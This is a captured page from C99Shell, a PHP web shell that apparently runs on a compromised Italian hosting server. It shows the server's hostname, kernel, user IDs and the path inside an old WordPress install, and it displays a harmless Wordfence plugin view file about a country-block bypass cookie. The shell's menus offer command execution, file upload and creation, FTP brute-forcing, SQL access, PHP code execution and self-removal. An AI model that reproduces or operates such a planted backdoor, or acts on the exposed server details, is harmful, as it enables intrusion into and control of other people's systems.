!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/wordfence/views/blocking/   drwxr-xr-x
Free 179.26 GB of 490.84 GB (36.52%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     option-bypass-cookie.php (2.11 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
if (!defined('WORDFENCE_VERSION')) { exit; }
?>
<ul id="wf-option-cbl-bypassViewURL" class="wf-option wf-option-bypass-cookie">
    <li class="wf-option-spacer"></li>
    <li class="wf-option-content">
        <ul>
            <li class="wf-option-title"><?php _e('Bypass Cookie''wordfence'); ?> <a href="<?php echo wfSupportController::esc_supportURL(wfSupportController::ITEM_FIREWALL_BLOCKING_BYPASS_COOKIE); ?>" target="_blank" rel="noopener noreferrer" class="wf-inline-help"><i class="wf-fa wf-fa-question-circle-o" aria-hidden="true"></i></a></li>
            <li class="wf-option-fields">
                <table class="wf-full-width">
                    <tr>
                        <td class="wf-right wf-padding-add-right"><?php _e('If user who is allowed to access the site views the relative URL''wordfence'); ?></td>
                        <td class="wf-option-text"><input id="wf-bypass-view-url" type="text" value="<?php echo esc_attr(wfConfig::get('cbl_bypassViewURL')); ?>" placeholder="<?php esc_attr_e('/set-country-bypass/''wordfence'); ?>" data-option="cbl_bypassViewURL" data-original-value="<?php echo esc_attr(wfConfig::get('cbl_bypassViewURL')); ?>"></td>
                    </tr>
                    <tr>
                        <td colspan="2" class="wf-right wf-padding-add-top-small"><?php _e('then set a cookie that will bypass country blocking in future in case that user hits the site from a blocked country.''wordfence'); ?></td>
                    </tr>
                </table>
                <script type="application/javascript">
                    (function($) {
                        $(function() {
                            $('#wf-bypass-view-url').on('keyup', function() {
                                var option = $(this).data('option');
                                var value = $(this).val();
        
                                var originalValue = $(this).data('originalValue');
                                if (originalValue == value) {
                                    delete WFAD.pendingChanges[option];
                                }
                                else {
                                    WFAD.pendingChanges[option] = value;
                                }
        
                                WFAD.updatePendingChanges();
                            });
        
                            $(window).on('wfOptionsReset', function() {
                                $('#wf-bypass-view-url').each(function() {
                                    var originalValue = $(this).data('originalValue');
                                    $(this).val(originalValue);
                                });
                            });
                        });
                    })(jQuery);
                </script>
            </li>
        </ul>
    </li>
</ul>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0122 ]--